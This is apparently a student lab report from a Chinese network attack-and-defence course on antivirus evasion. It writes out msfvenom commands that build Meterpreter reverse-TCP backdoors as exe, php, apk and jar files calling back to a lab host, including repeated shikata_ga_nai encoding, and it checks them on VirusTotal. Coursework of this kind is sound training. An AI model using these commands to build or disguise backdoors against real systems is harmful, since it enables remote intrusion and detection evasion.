20181328 《网络对抗技术》Exp3 免杀原理与实践

一、实验内容:

  • 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件
    • msfvenom生成php文件
    • msfvenom生成apk文件
    • msfvenom生成jar文件
    • veil
    • 使用C + shellcode编程
    • 加壳工具(压缩壳、加密壳)
  • 2.通过组合应用各种技术实现恶意代码免杀
    • 免杀实践1
    • 免杀实践2
    • 免杀实践3(强一些)
  • 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
    • 对免杀实践1做出的exe进行测试
    • 对免杀实践3做出的exe进行测试

二、实验要求:

  • 1.报告格式范围,版面整洁 加0.5
  • 2.报告排版混乱,加0分。
  • 3.报告逻辑混乱表述不清或文字有明显抄袭可能 -1

 

三、实验步骤:

 

一、正确使用msf编码器

1.使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门

 msfvenom -l encoders 

20181328 《网络对抗技术》Exp3 免杀原理与实践

 

2.对实验二生成的20181328_backdoor.exe后门程序用VirusTotal进行扫描,结果如下图所示:

 

20181328 《网络对抗技术》Exp3 免杀原理与实践

 

 

一次编码:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded.exe 

 

20181328 《网络对抗技术》Exp3 免杀原理与实践

十次编码:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded10.exe

20181328 《网络对抗技术》Exp3 免杀原理与实践

 

3.msfvenom生成php文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.php

20181328 《网络对抗技术》Exp3 免杀原理与实践

20181328 《网络对抗技术》Exp3 免杀原理与实践

 

 4.msfvenom生成apk文件

 

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.apk

 

20181328 《网络对抗技术》Exp3 免杀原理与实践

 

 

 20181328 《网络对抗技术》Exp3 免杀原理与实践

 

 

5.msfvenom生成jar文件

 

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.136 LPORT=1328 x> zwq_backdoor_java.jar

 

20181328 《网络对抗技术》Exp3 免杀原理与实践

 

 20181328 《网络对抗技术》Exp3 免杀原理与实践

 

上一篇:Shell 脚本 test 命令详解


下一篇:信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---4.4实例——入侵Windows10